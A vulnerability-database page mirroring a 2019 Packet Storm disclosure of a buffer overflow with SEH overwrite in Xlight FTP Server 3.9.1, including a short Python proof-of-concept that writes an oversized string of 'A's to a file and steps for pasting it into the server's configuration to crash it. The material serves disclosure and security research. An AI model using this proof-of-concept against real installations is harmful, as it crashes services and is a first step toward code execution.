Lucene search
K

Xlight FTP Server 3.9.1 Buffer Overflow

🗓️ 25 Feb 2019 00:00:00Reported by Logan WhitmireType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

Xlight FTP Server 3.9.1 Buffer Overflow, SEH Overwrite, Windows X

Code
`# Exploit Title: Xlight 3.9.1 FTP Server SEH Overwrite  
# Google Dork: N/A  
# Date: 2019-02-24  
# Exploit Author: Logan Whitmire  
# Vendor Homepage: https://www.xlightftpd.com/index.htm  
# Software Link: https://www.xlightftpd.com/download/xlight.zip  
# Version: 3.9.1  
# Tested on: Windows XP  
# CVE : N/A  
  
  
POC:#!/usr/bin/python  
#Vulnerable Software: Xlight FTP Server 3.9.1  
#Link: https://www.xlightftpd.com/download.htm  
#Date: 2019-02-24  
#Twitter: thermal_tp  
#inspired by bzyo's exploit  
# 1. Generate overflow.txt, open, and copy contents to clipboard  
# 2. Virtual Server  
# 3. Modify Virtual Server Configuration  
# 4. Advanced  
# 5. Misc  
# 6. Execute a program after user logged in  
# 7. Setup  
# 8. Paste crash.txt contents  
# 9. Application crashes  
# 10. SEH is overwritten  
  
buffer="A"*428  
file="overflow.txt"  
generate=open(file, "w")  
generate.write(buffer)  
generate.close  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation